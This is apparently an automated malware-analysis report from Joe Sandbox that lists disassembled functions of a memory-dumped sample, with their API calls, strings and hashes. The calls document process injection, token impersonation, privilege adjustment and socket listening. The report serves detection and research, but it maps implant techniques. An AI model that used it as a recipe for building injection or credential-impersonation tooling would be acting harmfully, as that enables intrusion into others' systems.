Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: Time$FileFind$ErrorHeapLastSystem_malloc$AllocateCloseCurrentDirectoryFirstFreeLocalNextSpecific___sbh_find_block___sbh_free_block__lock_memset_strncmp_vswprintf_s_vwprintfhtonl
String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
API String ID: 2804257087-1754256099
Opcode ID: 440c229cf5b9fbe92f06373b967eba4cf06b59d4af5311defed6a40375ca1115
Instruction ID: cb6f10b53a8dc820b15ab584f1a4d3814afe4cf4af8a66c4d06bda8e51b9d1d1
Opcode Fuzzy Hash: 440c229cf5b9fbe92f06373b967eba4cf06b59d4af5311defed6a40375ca1115
Instruction Fuzzy Hash: 915152B2D40229BADB90E7E6DC49EFF77BCAF08701F444426FA25E1181FA349A448771

Uniqueness

Uniqueness Score: -1.00%

Function 06768FCB Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 155processCOMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 06768FED

Part of subcall function 06761683: _malloc.LIBCMT ref: 06761689

GetCurrentProcess.KERNEL32 ref: 06769031
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 06769065
Process32First.KERNEL32(00000000,?), ref: 06769087
CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 06769091

Part of subcall function 067616D3: htonl.WS2_32(0000001F), ref: 067616D9

OpenProcess.KERNEL32(-00000400,00000000,?,00000002,00000000), ref: 067690BE
ProcessIdToSessionId.KERNEL32(?,?), ref: 06769113
CloseHandle.KERNEL32(00000000), ref: 06769164
Process32Next.KERNEL32(00000000,00000128), ref: 0676916E
CloseHandle.KERNEL32(00000000), ref: 0676917C

Part of subcall function 06768F5E: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,067690FD,00000000,00000000), ref: 06768F6B

Strings

%s%d%d%s%s%d, xrefs: 06769155
x64, xrefs: 06769042, 06769050
%s%d%d, xrefs: 067690E0
x86, xrefs: 0676912A, 0676913E

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: Process$CloseHandle$OpenProcess32$CreateCurrentFirstNextSessionSnapshotTokenToolhelp32_malloc_memsethtonl
String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
API String ID: 1744962696-1833344708
Opcode ID: d9a73793fc94c2f9530615979d7ad1eec285c60ff05b6a1ae29428231fb4cda4
Instruction ID: d7d40545af18d54f4cda87ad2a26c748d625e3a354d3082dab4745f775bdbf58
Opcode Fuzzy Hash: d9a73793fc94c2f9530615979d7ad1eec285c60ff05b6a1ae29428231fb4cda4
Instruction Fuzzy Hash: 10515872D4021EAEEFD1A7A6CC49EEF7BBC9F04354F104055FB19E2041EB359A458B61

Uniqueness

Uniqueness Score: -1.00%

Function 06763E1F Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 181processCOMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 06763E4D
_memset.LIBCMT ref: 06763E69

Part of subcall function 06762E99: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,0676406E,00000400,?,06763E93,0676406E,?,00000400), ref: 06762EAF
Part of subcall function 06762E99: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,0676406E,06763E93,?,06763E93,0676406E,?,00000400,?,?,?,?,0676406E), ref: 06762EC8

GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0676406E,06767FC2,?,?,06767FC2,06768ED8,?), ref: 06763EB3
GetCurrentDirectoryW.KERNEL32(00000400,?,?,?,?,?,?,?,?,0676406E,06767FC2,?,?,06767FC2,06768ED8,?), ref: 06763EC2
CreateProcessWithTokenW.ADVAPI32(00000002,00000000,?,C0330CC4,00000000,?,F3E8296A,83FFFFE3), ref: 06763EF0

Strings

system32, xrefs: 06763FA5
sysnative, xrefs: 06763F85

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: ByteCharCurrentDirectoryMultiWide_memset$CreateProcessTokenWith
String ID: sysnative$system32
API String ID: 2486443368-2461298002
Opcode ID: 59f583fc9239cb5641009dbfbddbf40319f9cc95e609a8b7c038ace92ca64b76
Instruction ID: 5a4306da9d030c8cd429104a562ca088557c29cb678e2f39cd9807231875be05
Opcode Fuzzy Hash: 59f583fc9239cb5641009dbfbddbf40319f9cc95e609a8b7c038ace92ca64b76
Instruction Fuzzy Hash: 9451E572914205AFD7A19F65DC88EBA77E8EF05320F148429FE58D3140E731D918CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 067691F0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 84fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 067691FD

Part of subcall function 067758CD: __FF_MSGBANNER.LIBCMT ref: 067758F0
Part of subcall function 067758CD: __NMSG_WRITE.LIBCMT ref: 067758F7
Part of subcall function 067758CD: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,0677D8A9,00000000,00000001,00000000,?,0677766D,00000018,06790748,0000000C,067776FE), ref: 06775944

__snprintf.LIBCMT ref: 0676920E
FindFirstFileA.KERNEL32(00000000,0676466D,?,067692DF,0676466D,?,067645F1), ref: 0676921B

Part of subcall function 067757F0: __lock.LIBCMT ref: 0677580E
Part of subcall function 067757F0: ___sbh_find_block.LIBCMT ref: 06775819
Part of subcall function 067757F0: ___sbh_free_block.LIBCMT ref: 06775828
Part of subcall function 067757F0: HeapFree.KERNEL32(00000000,00000000,067905E8,0000000C,0677A726,00000000,?,0677D8A9,00000000,00000001,00000000,?,0677766D,00000018,06790748,0000000C), ref: 06775858
Part of subcall function 067757F0: GetLastError.KERNEL32(?,0677D8A9,00000000,00000001,00000000,?,0677766D,00000018,06790748,0000000C,067776FE,00000000,00000000,?,0677A7E0,0000000D), ref: 06775869

_malloc.LIBCMT ref: 0676925A
__snprintf.LIBCMT ref: 0676926F

Part of subcall function 067691B3: _malloc.LIBCMT ref: 067691BE
Part of subcall function 067691B3: __snprintf.LIBCMT ref: 067691D2

FindNextFileA.KERNEL32(000000FF,0676466D,?,?,?,?,?,?,?), ref: 0676929C
FindClose.KERNEL32(000000FF,?,?,?,?,?,?,?), ref: 067692A9

Strings

%s\*, xrefs: 06769207

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: Find__snprintf_malloc$FileHeap$AllocateCloseErrorFirstFreeLastNext___sbh_find_block___sbh_free_block__lock
String ID: %s\*
API String ID: 1254174322-766152087
Opcode ID: 6094711540bfc9c0dce8d97c300075bfa4a8558425edfeba0ef19786583a9614
Instruction ID: 29fb770f17e3a3ef8577d219ac87e6bfdba039f0c201e1baddb97ab874db96ab
Opcode Fuzzy Hash: 6094711540bfc9c0dce8d97c300075bfa4a8558425edfeba0ef19786583a9614
Instruction Fuzzy Hash: 8E21B332901248BFEF90AF21CC49EAB3F6EEF41261F188024FE14A7151EB318D11D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 067658D9 Relevance: 10.6, APIs: 7, Instructions: 97memoryinjectionCOMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00003000,?,00000000,?,?,067654C2,00000000,00000000), ref: 0676590D
GetLastError.KERNEL32(?,067654C2,00000000,00000000), ref: 06765919
WriteProcessMemory.KERNEL32(00000000,067654C2,067654C2,?,00000000,?,067654C2,00000000,00000000), ref: 0676594E
VirtualProtectEx.KERNEL32(00000000,00000000,00000000,?,067654C2,?,067654C2,00000000,00000000), ref: 06765994
GetLastError.KERNEL32(?,067654C2,00000000,00000000), ref: 0676599E
GetLastError.KERNEL32(?,00000000,?,067654C2,00000000,00000000), ref: 067659A9
VirtualFree.KERNEL32(00000000,00000000,00008000,?,067654C2,00000000,00000000), ref: 067659C1

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: ErrorLastVirtual$AllocFreeMemoryProcessProtectWrite
String ID:
API String ID: 2897431253-0
Opcode ID: a1b444c8ebf25cb0e1d740159fe2048ba65af81d358af72b8e9d2759b892304e
Instruction ID: fd932117fdb17abd000f1f55e78f7f61cfc53f7fcf34fb69ac55a7739c2f936f
Opcode Fuzzy Hash: a1b444c8ebf25cb0e1d740159fe2048ba65af81d358af72b8e9d2759b892304e
Instruction Fuzzy Hash: 0221B976A40309BEFB916A669C4DFBE3B69EB40751F648025FF10E5080DB708D40EA61

Uniqueness

Uniqueness Score: -1.00%

Function 0676733D Relevance: 9.1, APIs: 6, Instructions: 68networkCOMMON

Download Yara Rule

APIs

htonl.WS2_32 ref: 0676735A
htons.WS2_32(?), ref: 0676736A

Part of subcall function 06762B61: WSAStartup.WS2_32(00000202,?), ref: 06762B7F
Part of subcall function 06762B61: WSACleanup.WS2_32 ref: 06762B89

socket.WS2_32(00000002,00000002,00000000), ref: 06767380
closesocket.WS2_32(00000000), ref: 0676738D
bind.WS2_32(00000000,?,00000010), ref: 067673BB
ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 067673D2

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: CleanupStartupbindclosesockethtonlhtonsioctlsocketsocket
String ID:
API String ID: 3327401275-0
Opcode ID: b34f016ee1ae9ea7f459746af00e6624bd39752b728fa7e4e75d3fb40ac90aa4
Instruction ID: fbafe717c1b0876710703584c30cd54f29b001e3eb25e5fed9cba5b5ba4b970b
Opcode Fuzzy Hash: b34f016ee1ae9ea7f459746af00e6624bd39752b728fa7e4e75d3fb40ac90aa4
Instruction Fuzzy Hash: 31118671E502186ED790EBBA9C49EAEB6EC9F04368F104526FB24F61C1E6744E048795

Uniqueness

Uniqueness Score: -1.00%

Function 06763303 Relevance: 9.1, APIs: 6, Instructions: 68sleepnetworkCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 06763315

Part of subcall function 06762B61: WSAStartup.WS2_32(00000202,?), ref: 06762B7F
Part of subcall function 06762B61: WSACleanup.WS2_32 ref: 06762B89

Sleep.KERNEL32(000003E8,?,?,?,00000001,?,?,00000000,?,?,00000000), ref: 06763385
GetTickCount.KERNEL32 ref: 0676338B
Sleep.KERNEL32(000003E8,00000000,00000000,?,00000000,?,?,?,00000001,?,?,00000000,?,?,00000000), ref: 0676339E
closesocket.WS2_32(00000000), ref: 067633A5
send.WS2_32(00000000,00000000,?,00000000), ref: 067633B8

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: CountSleepTick$CleanupStartupclosesocketsend
String ID:
API String ID: 2410302135-0
Opcode ID: 2c9968085b6708362c9fc6559a12dbc4cb885297b8a40327716589d7508c7cb1
Instruction ID: 98239f55fb73e5d477ae96dc812726d0e0262f20890d81d8a6eb90468fa8ea6b
Opcode Fuzzy Hash: 2c9968085b6708362c9fc6559a12dbc4cb885297b8a40327716589d7508c7cb1
Instruction Fuzzy Hash: F7117F72C0421CAFDF81ABF6DC498DE7B79AB04220F144526FB21B6190EA759A408BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0676725B Relevance: 9.1, APIs: 6, Instructions: 54networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 06762B61: WSAStartup.WS2_32(00000202,?), ref: 06762B7F
Part of subcall function 06762B61: WSACleanup.WS2_32 ref: 06762B89

socket.WS2_32(00000002,00000001,00000000), ref: 06767273
htons.WS2_32(00000001), ref: 0676728F
ioctlsocket.WS2_32(00000000,8004667E,?), ref: 067672A8
closesocket.WS2_32(00000000), ref: 067672B3
bind.WS2_32(00000000,0676730D,00000010), ref: 067672C1
listen.WS2_32(00000000,?), ref: 067672CF

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: CleanupStartupbindclosesockethtonsioctlsocketlistensocket
String ID:
API String ID: 3027695370-0
Opcode ID: 5f49ceef136cd73c881599785e64ab6010ca77c0c6bb1a620f985cbbc62a17f1
Instruction ID: fac69024476c1413aff84ac53cfb6393a27d6f623df536ea746f2e54570d8250
Opcode Fuzzy Hash: 5f49ceef136cd73c881599785e64ab6010ca77c0c6bb1a620f985cbbc62a17f1
Instruction Fuzzy Hash: E1012831A40618BECB91FFA58C45AFEBA7AEF01654F204101FE10F2180E7704E41C3EA

Uniqueness

Uniqueness Score: -1.00%

Function 0677D2CE Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 06780D6D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 06780D82
UnhandledExceptionFilter.KERNEL32(06788C28), ref: 06780D8D
GetCurrentProcess.KERNEL32(C0000409), ref: 06780DA9
TerminateProcess.KERNEL32(00000000), ref: 06780DB0

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 400a0fe267fa35f699654e1ea6b5a507e61b398e55908409f09e378847d800ba
Instruction ID: d1147dd11d1ed0a0e87fa600add2b58bf5d37325742b9c6c0588dab4561c607e
Opcode Fuzzy Hash: 400a0fe267fa35f699654e1ea6b5a507e61b398e55908409f09e378847d800ba
Instruction Fuzzy Hash: 8621A0B4952304DFE794EF25E984A543BE2FB48720F50821EEB08C7241E7745986CF66

Uniqueness

Uniqueness Score: -1.00%

Function 0676BFB7 Relevance: 7.5, APIs: 5, Instructions: 46networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 06762B61: WSAStartup.WS2_32(00000202,?), ref: 06762B7F
Part of subcall function 06762B61: WSACleanup.WS2_32 ref: 06762B89

socket.WS2_32(00000002,00000001,00000000), ref: 0676BFC9
closesocket.WS2_32(00000000), ref: 0676BFD6
htons.WS2_32(?), ref: 0676BFE7
bind.WS2_32(00000000,?,00000010), ref: 0676BFFE
listen.WS2_32(00000000,00000078), ref: 0676C00F

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: CleanupStartupbindclosesockethtonslistensocket
String ID:
API String ID: 3713690034-0
Opcode ID: 8962adb44c8488a45447554804ee494b3f486d9bdaddb4fec04d4349081a4966
Instruction ID: 71e4db304eb9cfd5c1e8465e3b979d79558deb5f14589dc33c9f410da0458ab6
Opcode Fuzzy Hash: 8962adb44c8488a45447554804ee494b3f486d9bdaddb4fec04d4349081a4966
Instruction Fuzzy Hash: 6601D174D90214B9EBE13AB99C0AFFE32589F02720F508700FE74F50D1D7B08A518BAA

Uniqueness

Uniqueness Score: -1.00%

Function 06761FAA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 131libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,?,?,?), ref: 0676209A
LoadLibraryA.KERNEL32(00000000,?,?,?), ref: 067620A5
GetProcAddress.KERNEL32(00000000,00000000), ref: 067620AD

Part of subcall function 067624B5: _vswprintf_s.LIBCMT ref: 067624D1

Strings

%s!%s, xrefs: 067620EA

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: AddressHandleLibraryLoadModuleProc_vswprintf_s
String ID: %s!%s
API String ID: 2092861438-2935588013
Opcode ID: 75c3ff740d64f05c37204c25cf6737dad355d4990626332c064bcf0f725af4dc
Instruction ID: fafb89bbd71a121303551f803f5a9ae8cc12338ba1ea80a78ca7a59d8ae352dd
Opcode Fuzzy Hash: 75c3ff740d64f05c37204c25cf6737dad355d4990626332c064bcf0f725af4dc
Instruction Fuzzy Hash: 7E4126729140009FEFE8DF62D8589B73775DB84320F658056FF22AB286DA31DE46C791

Uniqueness

Uniqueness Score: -1.00%

Function 06763751 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMONLIBRARYCODE

Download Yara Rule

APIs

LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 067637AD
AdjustTokenPrivileges.ADVAPI32(?,00000000,067639B5,00000000,00000000,00000000,?,?,?,00000001), ref: 067637D0
GetLastError.KERNEL32(?,?,?,00000001), ref: 067637DA

Part of subcall function 06761726: _vwprintf.LIBCMT ref: 06761730
Part of subcall function 06761726: _vswprintf_s.LIBCMT ref: 06761754

Strings

%s, xrefs: 067637E7

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue_vswprintf_s_vwprintf
String ID: %s
API String ID: 2004037343-620797490
Opcode ID: 5fd0a9afed05e2c8222eb4cc0a8b7e73585c7d019e7d25ecc54517b64ecc75e3
Instruction ID: a6b937822e844047f987dba7927b68b0a47620a9eec9f908c84cfee115e8e5dc
Opcode Fuzzy Hash: 5fd0a9afed05e2c8222eb4cc0a8b7e73585c7d019e7d25ecc54517b64ecc75e3
Instruction Fuzzy Hash: 3B112EB2901219BEEB919BAADD499FFBBBDEB08254F100425FA14E6050D631DE04C6B2

Uniqueness

Uniqueness Score: -1.00%

Function 0676B9E9 Relevance: 6.1, APIs: 4, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0676B6B4: CloseHandle.KERNEL32(?), ref: 0676B6BE
Part of subcall function 0676B6B4: RevertToSelf.ADVAPI32 ref: 0676B6CB

LogonUserA.ADVAPI32(?,?,0676BB96,00000009,00000003,0679AEA4), ref: 0676BA06
GetLastError.KERNEL32(?,0676BB96,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0676BA10

Part of subcall function 06766F4C: _malloc.LIBCMT ref: 06766F52
Part of subcall function 06766F4C: _malloc.LIBCMT ref: 06766F62

Part of subcall function 06762E99: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,0676406E,00000400,?,06763E93,0676406E,?,00000400), ref: 06762EAF
Part of subcall function 06762E99: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,0676406E,06763E93,?,06763E93,0676406E,?,00000400,?,?,?,?,0676406E), ref: 06762EC8

Part of subcall function 0676B6F0: _memset.LIBCMT ref: 0676B714
Part of subcall function 0676B6F0: _memset.LIBCMT ref: 0676B722
Part of subcall function 0676B6F0: _memset.LIBCMT ref: 0676B730
Part of subcall function 0676B6F0: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,00001000,0676B7CF,?,?,?,?,?,0676B7CF,?,?), ref: 0676B74D

ImpersonateLoggedOnUser.ADVAPI32(?,0676BB96,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0676BA2B
GetLastError.KERNEL32(?,0676BB96,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0676BA35

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: _memset$ByteCharErrorLastMultiUserWide_malloc$CloseHandleImpersonateInformationLoggedLogonRevertSelfToken
String ID:
API String ID: 2878441771-0
Opcode ID: 8751de549cf2e1c9788ac5278cb57537e48f9216d3bb86e3ec4ef2c2de6eae78
Instruction ID: 7449868d7a0bde6f1337b89cd259489102ceb66fb62990928b137e328b239838
Opcode Fuzzy Hash: 8751de549cf2e1c9788ac5278cb57537e48f9216d3bb86e3ec4ef2c2de6eae78
Instruction Fuzzy Hash: C821D271901208BFDB916F62EC0EF663FAAEB01710F24C024FF14D5151EAB289259B61

Uniqueness

Uniqueness Score: -1.00%

Function 06766BE7 Relevance: 6.1, APIs: 4, Instructions: 63sleepnetworkCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 06766BF6

Part of subcall function 06762B61: WSAStartup.WS2_32(00000202,?), ref: 06762B7F
Part of subcall function 06762B61: WSACleanup.WS2_32 ref: 06762B89

Sleep.KERNEL32(000003E8), ref: 06766C46
GetTickCount.KERNEL32 ref: 06766C4C
WSAGetLastError.WS2_32 ref: 06766C52

Part of subcall function 06766BA1: ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 06766BB3

Part of subcall function 06766371: _memset.LIBCMT ref: 06766392

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: CountTick$CleanupErrorLastSleepStartup_memsetioctlsocket
String ID:
API String ID: 1195850169-0
Opcode ID: de9bcd8644798ebf6c6558ce861247a018b85cfc82d2d51fb679711ab7c7a4ea
Instruction ID: c3d1430a1d977c0b11af2fd281eee38d50a009e250a25e02e88165e1d3c9af02
Opcode Fuzzy Hash: de9bcd8644798ebf6c6558ce861247a018b85cfc82d2d51fb679711ab7c7a4ea
Instruction Fuzzy Hash: 2711E933C04108AFDF81B7B69C495AE7B69DB44234F644126FF25E61C0ED316D4547D6

Uniqueness

Uniqueness Score: -1.00%

Function 067843C0 Relevance: 5.6, Strings: 4, Instructions: 612COMMON

Download Yara Rule

Strings

, xrefs: 0678473C
<, xrefs: 06784746
abcdefghijklmnop, xrefs: 067843CB
abcdefghijklmnop, xrefs: 067843CA

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID:
String ID: $<$abcdefghijklmnop$abcdefghijklmnop
API String ID: 0-3339112986
